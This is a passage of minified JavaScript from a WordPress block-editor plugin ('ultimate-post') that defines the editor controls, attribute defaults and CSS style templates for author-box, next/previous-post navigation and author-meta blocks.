Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"viewAllPostHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"viewAllPostBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"dimension",key:"viewAllPostHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"separator"}},{data:{type:"dimension",key:"viewAllPostPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"viewAllPostMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))},64530:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},layout:{type:"string",default:"layout1"},currentPostId:{type:"string",default:""},imgShow:{type:"boolean",default:!0},writtenByShow:{type:"boolean",default:!0},authorBioShow:{type:"boolean",default:!0},metaShow:{type:"boolean",default:!0},allPostLinkShow:{type:"boolean",default:!0},authorBoxAlign:{type:"object",default:"center",style:[{depends:[{key:"layout",condition:"!=",value:"layout2"},{key:"layout",condition:"!=",value:"layout4"}],selector:"{{ULTP}} .ultp-author-box {text-align:{{authorBoxAlign}};}"}]},boxContentBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{selector:"{{ULTP}} .ultp-author-box"}]},boxContentBorder:{type:"object",default:{openBorder:0},style:[{selector:"{{ULTP}} .ultp-author-box"}]},boxContentRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-author-box { border-radius:{{boxContentRadius}}; }"}]},boxContentPad:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-author-box { padding:{{boxContentPad}}; }"}]},imgSize:{type:"object",default:{lg:"100"},style:[{depends:[{key:"imgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-box img { height:{{imgSize}}px !important; width:{{imgSize}}px !important; }"}]},imgSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout1"}],selector:"{{ULTP}} .ultp-post-author-image-section > img { margin-bottom: {{imgSpace}}; }"},{depends:[{key:"authImgStack",condition:"==",value:!1},{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-right: {{imgSpace}}; }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-post-author-image-section > img { margin-bottom: {{imgSpace}}; }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"authImgStack",condition:"==",value:!1},{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-left: {{imgSpace}}; }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"authImgStack",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-right: {{imgSpace}}; } @media only screen and (max-width: 600px) { {{ULTP}} .ultp-post-author-image-section { margin-bottom: {{imgSpace}}; margin-right: 0px; }  }"},{depends:[{key:"imgShow",condition:"==",value:!0},{key:"authImgStack",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-post-author-image-section { margin-left: {{imgSpace}}; } @media only screen and (max-width: 600px) { {{ULTP}} .ultp-post-author-image-section { margin-bottom: {{imgSpace}}; margin-left: 0px; }}"}]},imgUp:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"imgShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-author-box-layout3-content .ultp-post-author-image-section > img { margin-top: -{{imgUp}}; } {{ULTP}} .ultp-block-wrapper { margin-top: {{imgUp}}; }"}]},imgBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000",type:"solid"},style:[{depends:[{key:"imgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-image-section > img"}]},imgRadius:{type:"object",default:{lg:"100",unit:"px"},style:[{depends:[{key:"imgShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-image-section > img { border-radius:{{imgRadius}}; }"}]},authImgStack:{type:"boolean",default:!0,style:[{selector:"@media only screen and (max-width: 600px) { .ultp-author-box-layout2-content {  display: block; text-align: center; } }"}]},imgRatio:{type:"string",default:"100"},writtenByText:{type:"string",default:"Written by"},writtenByColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"writtenByShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-written-by {color:{{writtenByColor}};}"}]},writtenByTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"}},style:[{depends:[{key:"writtenByShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-written-by"}]},authorNameTag:{type:"string",default:"h4"},authorNameColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-post-author-name a {color:{{authorNameColor}} !important; }"}]},authorNameHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-post-author-name a:hover { color:{{authorNameHoverColor}} !important; }"}]},authorNameTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-post-author-name"}]},authorBioColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"authorBioShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-bio-meta {color:{{authorBioColor}};}"}]},authorBioTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"22",unit:"px"}},style:[{depends:[{key:"authorBioShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-bio"}]},authorBioMargin:{type:"object",default:{lg:{top:"20",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"authorBioShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-bio { margin:{{authorBioMargin}}; }"}]},metaPosition:{type:"string",default:"bottom"},metaColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-total-post, {{ULTP}} .ultp-total-comment { color: {{metaColor}}; }"}]},metaTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta"}]},metaMargin:{type:"object",default:{lg:{top:"12",unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta { margin:{{metaMargin}}; }"}]},metaPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta { padding:{{metaPadding}}; }"}]},metaBg:{type:"string",default:"",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta { background:{{metaBg}}; }"}]},metaBorder:{type:"object",default:{openBorder:0,width:{top:1,right:"0",bottom:"0",left:"0"},color:"#009fd4",type:"solid"},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-post-author-meta"}]},viewAllPostText:{type:"string",default:"View All Posts"},viewAllPostTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text"}]},viewAllPostColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link a:not(.wp-block-button__link), {{ULTP}} .ultp-author-post-link-text {color:{{viewAllPostColor}};}"}]},viewAllPostBg:{type:"string",default:"",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text"}]},viewAllPostRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text { border-radius:{{viewAllPostRadius}}; }"}]},viewAllPostHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link .ultp-author-post-link-text:hover { color:{{viewAllPostHoverColor}}; }"}]},viewAllPostBgHoverColor:{type:"string",default:"",style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text:hover"}]},viewAllPostHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text:hover { border-radius:{{viewAllPostHoverRadius}}; }"}]},viewAllPostPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link-text { padding:{{viewAllPostPadding}}; }"}]},viewAllPostMargin:{type:"object",default:{lg:{top:"15",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"allPostLinkShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-author-post-link { margin:{{viewAllPostMargin}}; }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},41544:(e,t,l)=>{"use strict";var o=l(67294),a=l(62568),i=l(64530),n=l(23826);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/author_box.svg",alt:"Post Author"}),attributes:i.Z,edit:a.Z,save:()=>null})},90191:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(31760),s=l(64766),p=l(40200);const{__}=wp.i18n,{InspectorControls:c,useBlockProps:u}=wp.blockEditor,{Fragment:d}=wp.element;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:g,className:y,attributes:{blockId:b,advanceId:v,headingEnable:h,imageShow:f,titleShow:k,navDivider:w,iconShow:x,dividerBorderShape:T,arrowIconStyle:_,dateShow:C,titlePosition:E,layout:S,prevHeadText:P,nextHeadText:L,currentPostId:I}}=e,B={setAttributes:t,name:l,attributes:m,clientId:g};(0,n.S)({blockId:b,clientId:g,currentPostId:I,setAttributes:t,checkRef:!1});const U=(e,t,l)=>{const a=(0,o.createElement)("div",{className:"ultp-nav-img "+(x&&"style2"==S?"ultp-npb-overlay":"")},x&&"style2"==S&&(l?e:t),f&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg"}));return(0,o.createElement)("a",{className:l?`ultp-nav-block-prev ultp-nav-prev-${S}`:`ultp-nav-block-next ultp-nav-next-${S}`,href:"#"},h&&!E&&"style2"==S&&(0,o.createElement)("div",{className:l?"ultp-prev-title":"ultp-next-title"},l?P:L),l&&x&&"style2"!=S&&e,(0,o.createElement)("div",{className:"ultp-nav-inside"},h&&!E&&"style2"!=S&&(0,o.createElement)("div",{className:l?"ultp-prev-title":"ultp-next-title"},l?P:L),(0,o.createElement)("div",{className:"ultp-nav-inside-container"},1==l&&a,0==l&&"style3"==S&&a,(0,o.createElement)("div",{className:"ultp-nav-text-content"},h&&E&&(0,o.createElement)("div",{className:l?"ultp-prev-title":"ultp-next-title"},l?P:L),C&&(0,o.createElement)("div",{className:"ultp-nav-date"},l?"25 Jan 2022":"10 Feb 2024"),k&&(0,o.createElement)("div",{className:"ultp-nav-title"},l?"Sample Title of the Previous Post":"Sample Title of the Next Post")),0==l&&"style3"!=S&&(0,o.createElement)("span",null,a))),0==l&&x&&"style2"!=S&&t)},M=(0,o.createElement)("span",{className:`ultp-icon ultp-icon-${_}`},s.ZP["left"+_]),A=(0,o.createElement)("span",{className:`ultp-icon ultp-icon-${_}`},s.ZP["right"+_]);b&&(0,i.Kh)(m,"ultimate-post/next-previous",b);const H=u({className:`ultp-block-${b} ${y}`,...v&&{id:v}});return(0,o.createElement)(d,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:B}),(0,a.dH)()),(0,o.createElement)(r.Z,{include:[{type:"layout",key:"layout",pro:!0,tab:!0,label:__("Style","ultimate-post"),block:"next-preview",options:[{img:"assets/img/layouts/builder/next_prev/next_prev_1.png",label:__("Style 1","ultimate-post"),value:"style1"},{img:"assets/img/layouts/builder/next_prev/next_prev_2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/builder/next_prev/next_prev_3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}],store:B}),(0,o.createElement)("div",H,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-block-nav"+(f?" next-prev-img":"")},U(M,A,!0),w&&T&&(0,o.createElement)("span",{className:"ultp-divider"}),U(M,A,!1)))))}},40200:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:__("General","ultimate-post"),include:[{data:{type:"layout",key:"layout",pro:!0,tab:!0,label:__("Style","ultimate-post"),block:"next-preview",options:[{img:"assets/img/layouts/builder/next_prev/next_prev_1.png",label:__("Style 1","ultimate-post"),value:"style1"},{img:"assets/img/layouts/builder/next_prev/next_prev_2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/builder/next_prev/next_prev_3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!0,title:__("Content","ultimate-post"),include:[{data:{type:"color",key:"navItemBg",label:__("Background","ultimate-post")}},{data:{type:"color",key:"navItemHovBg",label:__("Hover Background","ultimate-post")}},{data:{type:"dimension",key:"navItemPadd",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"navItemRad",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"border",key:"navItemBorder",label:__("Border","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Label","ultimate-post"),depend:"headingEnable",include:[{data:{type:"tab",key:"navHeadTab",content:[{name:"previous",title:__("Previous","ultimate-post"),options:[{type:"text",key:"prevHeadText",label:__("Previous Post Text","ultimate-post")},{type:"alignment",key:"prevHeadAlign",disableJustify:!0,label:__("Prev Nav Text Align","ultimate-post")},{type:"alignment",key:"prevContentAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}]},{name:"next",title:__("Next","ultimate-post"),options:[{type:"text",key:"nextHeadText",label:__("Next Post Text","ultimate-post")},{type:"alignment",key:"nextHeadAlign",disableJustify:!0,label:__("Next Nav Text Align","ultimate-post")},{type:"alignment",key:"nextContentAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}]}]}},{data:{type:"separator"}},{data:{type:"color",key:"prevHeadColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"prevHeadHovColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"prevHeadTypo",label:__("Typography","ultimate-post")}},{data:{type:"dimension",key:"prevHeadingSpace",label:__("Heading Space","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"toggle",key:"titlePosition",label:__("Align Beside Post Image","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Title","ultimate-post"),depend:"titleShow",include:[{data:{type:"color",key:"titleColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"titleHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"titleTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"titleSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Title Spacing X","ultimate-post")}},{data:{type:"range",key:"titleSpaceX",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Title Spacing y","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Date","ultimate-post"),depend:"dateShow",include:[{data:{type:"toggle",key:"datePosition",label:__("Date Below Title","ultimate-post")}},{data:{type:"color",key:"dateColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"dateHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"dateTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Image","ultimate-post"),depend:"imageShow",include:[{data:{type:"range",key:"navImgWidth",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Width","ultimate-post")}},{data:{type:"range",key:"navImgHeight",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Height","ultimate-post")}},{data:{type:"dimension",key:"navImgBorderRad",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Divider","ultimate-post"),depend:"navDivider",include:[{data:{type:"color",key:"dividerColor",label:__("Color","ultimate-post")}},{data:{type:"range",key:"dividerSpace",min:0,max:200,step:1,responsive:!0,unit:!0,label:__("Space","ultimate-post")}},{data:{type:"toggle",key:"dividerBorderShape",label:__("Dividers Shape","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Navigation","ultimate-post"),depend:"iconShow",include:[{data:{type:"select",key:"arrowIconStyle",label:__("Arrow Icon Style","ultimate-post"),options:[{value:"Angle",icon:"rightAngle",label:__("Arrow 1","ultimate-post")},{value:"Angle2",icon:"rightAngle2",label:__("Arrow 2","ultimate-post")},{value:"ArrowLg",icon:"rightArrowLg",label:__("Arrow 3","ultimate-post")}]}},{data:{type:"color",key:"arrowColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"arrowHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"range",min:0,max:80,step:1,responsive:!0,unit:!0,key:"arrowIconSpace",label:__("space","ultimate-post")}},{data:{type:"range",key:"arrowIconSize",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Icon Size","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))},99294:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"style1"},headingEnable:{type:"boolean",default:!0,style:[{depends:[{key:"layout",condition:"!=",0:!1}]}]},imageShow:{type:"boolean",default:!0},titleShow:{type:"boolean",default:!0},dateShow:{type:"boolean",default:!0},navDivider:{type:"boolean",default:!1},iconShow:{type:"boolean",default:!0},navItemBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-nav-block-prev, \n          {{ULTP}} .ultp-nav-block-next { background:{{navItemBg}}; }"}]},navItemHovBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-nav-block-prev:hover, \n          {{ULTP}} .ultp-nav-block-next:hover { background:{{navItemHovBg}}; }"}]},navItemPadd:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-block-next, \n          {{ULTP}} .ultp-nav-block-prev { padding:{{navItemPadd}}; }"}]},navItemRad:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-block-next, \n          {{ULTP}} .ultp-nav-block-prev { border-radius:{{navItemRad}}; }"}]},navItemBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#e5e5e5",type:"solid"},style:[{selector:"{{ULTP}} .ultp-nav-block-next ,{{ULTP}} .ultp-nav-block-prev"}]},titlePosition:{type:"boolean",default:!0},prevContentAlign:{type:"string",default:"left",style:[{depends:[{key:"prevContentAlign",condition:"==",value:"left"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev { text-align:{{prevContentAlign}}; justify-content:start;}"},{depends:[{key:"prevContentAlign",condition:"==",value:"center"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev { text-align:{{prevContentAlign}}; justify-content:center;}"},{depends:[{key:"prevContentAlign",condition:"==",value:"right"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev { text-align:{{prevContentAlign}}; justify-content:end;}"}]},nextContentAlign:{type:"string",default:"right",style:[{depends:[{key:"nextContentAlign",condition:"==",value:"left"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-next { text-align:{{nextContentAlign}}; justify-content:start;}"},{depends:[{key:"nextContentAlign",condition:"==",value:"center"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-next { text-align:{{nextContentAlign}}; justify-content:center;}"},{depends:[{key:"nextContentAlign",condition:"==",value:"right"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-next { text-align:{{nextContentAlign}}; justify-content:end;}"}]},prevHeadingSpace:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title, \n          {{ULTP}} .ultp-block-nav .ultp-next-title { margin:{{prevHeadingSpace}}; }"}]},prevHeadText:{type:"string",default:"Previous Post"},prevHeadColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title, \n          {{ULTP}} .ultp-block-nav .ultp-next-title { color:{{prevHeadColor}}; }"}]},prevHeadHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title:hover, \n          {{ULTP}} .ultp-block-nav .ultp-next-title:hover { color:{{prevHeadHovColor}}; }"}]},prevHeadTypo:{type:"object",default:{openTypography:0,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},transform:"capitalize",decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title, \n          {{ULTP}} .ultp-block-nav .ultp-next-title"}]},nextHeadText:{type:"string",default:"Next Post"},prevHeadAlign:{type:"string",default:"left",style:[{depends:[{key:"titlePosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-prev-title { text-align:{{prevHeadAlign}}; }"}]},nextHeadAlign:{type:"string",default:"right",style:[{depends:[{key:"titlePosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-next-title { text-align:{{nextHeadAlign}}; }"}]},titleColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-title { color:{{titleColor}}; }"}]},titleHoverColor:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-title:hover { color:{{titleHoverColor}}; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:22,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-title"}]},titleSpace:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content {gap:{{titleSpace}}}"}]},titleSpaceX:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"imageShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-block-next .ultp-nav-text-content {margin-right:{{titleSpaceX}}} \n          {{ULTP}} .ultp-nav-block-prev .ultp-nav-text-content { margin-left:{{titleSpaceX}}}"},{depends:[{key:"imageShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-nav-text-content {margin-left:{{titleSpaceX}}} \n          {{ULTP}} .ultp-nav-block-next .ultp-nav-text-content {margin-right:0}"}]},dateColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-date { color:{{dateColor}}; }"}]},dateHoverColor:{type:"string",default:"",style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-date:hover { color:{{dateHoverColor}}; }"}]},dateTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-date"}]},datePosition:{type:"boolean",default:!0,style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-text-content .ultp-nav-date{ order:2; }"},{depends:[{key:"dateShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-nav-text-content .ultp-nav-date{ order:0; }"}]},navImgWidth:{type:"object",default:{lg:"75",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-img img{width:{{navImgWidth}}}"}]},navImgHeight:{type:"object",default:{lg:"75",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-img img{height:{{navImgHeight}}}"}]},navImgBorderRad:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-img img { border-radius:{{navImgBorderRad}}; }"}]},dividerColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"dividerBorderShape",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-divider {background-color:{{dividerColor}};width:2px;}"}]},dividerSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-nav {gap:{{dividerSpace}}}"},{depends:[{key:"dividerBorderShape",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-nav {gap:{{dividerSpace}}}"}]},dividerBorderShape:{type:"boolean",default:!0},arrowIconStyle:{type:"string",default:"Angle2"},arrowColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-icon > svg{ color:{{arrowColor}}; }"}]},arrowHoverColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-icon svg:hover { color:{{arrowHoverColor}}; }"}]},arrowIconSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-icon svg{width:{{arrowIconSize}}}"}]},arrowIconSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev .ultp-icon svg{margin-right: {{arrowIconSpace}}} \n          {{ULTP}} .ultp-nav-block-next .ultp-icon svg{margin-left: {{arrowIconSpace}}}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},23061:(e,t,l)=>{"use strict";var o=l(67294),a=l(90191),i=l(99294),n=l(81837);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/next_previous.svg",alt:"next-preview"}),attributes:i.Z,edit:a.Z,save:()=>null})},53905:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,authMetaLabelText:v,authMetAvatar:h,authMetaIconStyle:f,authMetaLabel:k,authMetaIconShow:w,currentPostId:x}}=e;(0,s.S)({blockId:y,clientId:m,currentPostId:x,setAttributes:t,checkRef:!1});const T={setAttributes:t,name:l,attributes:d,clientId:m};y&&(0,n.Kh)(d,"ultimate-post/post-author-meta",y);const _=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"color",key:"authMetaIconColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"authMetaHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"authMetaTypo",label:__("Text 